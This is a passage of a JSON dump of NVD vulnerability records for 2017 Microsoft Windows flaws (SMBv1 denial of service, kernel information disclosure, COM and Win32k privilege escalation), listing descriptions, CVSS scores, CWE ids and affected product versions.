{"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.1, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0269", "CVE-2017-0273", "CVE-2017-0280"], "modified": "2018-03-28T01:29:00", "cpe": ["cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0280", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0280", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:51:27", "description": "The Microsoft Server Message Block 1.0 (SMBv1) allows denial of service when an attacker sends specially crafted requests to the server, aka \"Windows SMB Denial of Service Vulnerability\". This CVE ID is unique from CVE-2017-0273 and CVE-2017-0280.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0269", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0269", "CVE-2017-0273", "CVE-2017-0280"], "modified": "2018-03-28T01:29:00", "cpe": ["cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0269", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0269", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:49:58", "description": "The Windows kernel in Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 allows authenticated attackers to obtain sensitive information via a specially crafted document, aka \"Windows Kernel Information Disclosure Vulnerability,\" a different vulnerability than CVE-2017-0220, CVE-2017-0258, and CVE-2017-0259.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 4.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0175", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0175", "CVE-2017-0220", "CVE-2017-0258", "CVE-2017-0259"], "modified": "2018-10-30T16:28:00", "cpe": ["cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_server_2008:r2"], "id": "CVE-2017-0175", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0175", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:50:42", "description": "The Windows kernel in Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, and Windows Server 2012 Gold allows authenticated attackers to obtain sensitive information via a specially crafted document, aka \"Windows Kernel Information Disclosure Vulnerability,\" a different vulnerability than CVE-2017-0175, CVE-2017-0258, and CVE-2017-0259.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 4.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0220", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0175", "CVE-2017-0220", "CVE-2017-0258", "CVE-2017-0259"], "modified": "2017-08-13T01:29:00", "cpe": ["cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0220", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0220", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:51:15", "description": "The Windows kernel in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allows authenticated attackers to obtain sensitive information via a specially crafted document, aka \"Windows Kernel Information Disclosure Vulnerability,\" a different vulnerability than CVE-2017-0175, CVE-2017-0220, and CVE-2017-0259.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 4.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0258", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0175", "CVE-2017-0220", "CVE-2017-0258", "CVE-2017-0259"], "modified": "2020-09-28T12:58:00", "cpe": ["cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:*", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0258", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0258", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:itanium:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:51:18", "description": "The Windows kernel in Microsoft Windows 8.1, Windows Server 2012 R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allows authenticated attackers to obtain sensitive information via a specially crafted document, aka \"Windows Kernel Information Disclosure Vulnerability,\" a different vulnerability than CVE-2017-0175, CVE-2017-0220, and CVE-2017-0258.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 4.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0259", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0175", "CVE-2017-0220", "CVE-2017-0258", "CVE-2017-0259"], "modified": "2017-08-13T01:29:00", "cpe": ["cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2017-0259", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0259", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T18:49:20", "description": "A kernel-mode driver in Microsoft Windows XP SP3, Windows XP x64 XP2, Windows Server 2003 SP2, Windows Vista, Windows 7 SP1, Windows Server 2008 SP2 and R2 SP1, and Windows 8 allows an elevation of privilege when it fails to properly handle objects in memory, aka \"Win32k Elevation of Privilege Vulnerability\". This CVE is unique from CVE-2017-0263.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-06-15T01:29:00", "type": "cve", "title": "CVE-2017-8552", "cwe": ["CWE-281"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0263", "CVE-2017-8552"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_server_2008:r2"], "id": "CVE-2017-8552", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8552", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:50:36", "description": "Windows COM in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allows an elevation privilege vulnerability when Windows fails to properly validate input before loading type libraries, aka \"Windows COM Elevation of Privilege Vulnerability\". This CVE ID is unique from CVE-2017-0213.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0214", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0213", "CVE-2017-0214"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0214", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0214", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:50:35", "description": "Windows COM Aggregate Marshaler in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allows an elevation privilege vulnerability when an attacker runs a specially crafted application, aka \"Windows COM Elevation of Privilege Vulnerability\". This CVE ID is unique from CVE-2017-0214.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 4.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0213", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0213", "CVE-2017-0214"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0213", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0213", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:51:05", "description": "The Graphics Component in the kernel-mode drivers in Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, and 1607, and Windows Server 2016 allows local users to gain privileges via a crafted application or in Windows 7 for x64-based Systems and later, cause denial of service, aka \"Win32k Elevation of Privilege Vulnerability.\"", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0246", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0246"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0246", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0246", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:51:21", "description": "The kernel-mode drivers in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allow local users to gain privileges via a crafted application, aka \"Win32k Elevation of Privilege Vulnerability.\"", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0263", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0263"], "modified": 